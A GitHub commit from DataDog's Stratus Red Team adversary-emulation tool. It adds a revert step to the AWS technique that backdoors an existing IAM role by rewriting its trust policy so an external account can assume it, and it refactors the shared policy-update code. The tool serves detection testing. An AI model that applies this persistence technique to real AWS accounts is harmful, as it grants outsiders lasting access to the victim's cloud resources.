Add reversion function to aws.persistence.backdoor-iam-role (closes #65)

DataDog · Jan 26, 2022 · f8b9321 · f8b9321
1 parent fcae684
commit f8b9321
Show file tree

Hide file tree

Showing 2 changed files with 28 additions and 5 deletions.
diff --git a/internal/attacktechniques/aws/persistence/iam-role-backdoor-existing/main.go b/internal/attacktechniques/aws/persistence/iam-role-backdoor-existing/main.go
@@ -9,6 +9,7 @@ import (
 	"github.com/datadog/stratus-red-team/pkg/stratus"
 	"github.com/datadog/stratus-red-team/pkg/stratus/mitreattack"
 	"log"
+	"strings"
 )
 
 //go:embed main.tf
@@ -43,21 +44,39 @@ Detonation:
 		MitreAttackTactics:         []mitreattack.Tactic{mitreattack.Persistence},
 		PrerequisitesTerraformCode: tf,
 		Detonate:                   detonate,
+		Revert:                     revert,
 	})
 }
 
 func detonate(params map[string]string) error {
-	iamClient := iam.NewFromConfig(providers.AWS().GetConnection())
 	roleName := params["role_name"]
 
 	log.Println("Backdooring IAM role " + roleName + " by allowing sts:AssumeRole from an external AWS account")
-	_, err := iamClient.UpdateAssumeRolePolicy(context.Background(), &iam.UpdateAssumeRolePolicyInput{
-		RoleName:       &roleName,
-		PolicyDocument: &maliciousIamPolicy,
-	})
+	err := updateAssumeRolePolicy(roleName, maliciousIamPolicy)
+	if err != nil {
+		return errors.New("unable to backdoor IAM role: " + err.Error())
+	}
+	return nil
+}
+
+func revert(params map[string]string) error {
+	roleName := params["role_name"]
+	roleTrustPolicy := strings.ReplaceAll(params["role_trust_policy"], "\\", "") // Terraform output adds backslashes for some reason
+
+	log.Println("Reverting trust policy of IAM role " + roleName + " to its original state")
+	err := updateAssumeRolePolicy(roleName, roleTrustPolicy)
 
 	if err != nil {
 		return errors.New("unable to backdoor IAM role: " + err.Error())
 	}
 	return nil
 }
+
+func updateAssumeRolePolicy(roleName string, roleTrustPolicy string) error {
+	iamClient := iam.NewFromConfig(providers.AWS().GetConnection())
+	_, err := iamClient.UpdateAssumeRolePolicy(context.Background(), &iam.UpdateAssumeRolePolicyInput{
+		RoleName:       &roleName,
+		PolicyDocument: &roleTrustPolicy,
+	})
+	return err
+}
diff --git a/internal/attacktechniques/aws/persistence/iam-role-backdoor-existing/main.tf b/internal/attacktechniques/aws/persistence/iam-role-backdoor-existing/main.tf
@@ -39,6 +39,10 @@ output "role_name" {
   value = aws_iam_role.legit-role.name
 }
 
+output "role_trust_policy" {
+  value = aws_iam_role.legit-role.assume_role_policy
+}
+
 output "display" {
   value = format("IAM role %s ready", aws_iam_role.legit-role.name)
 }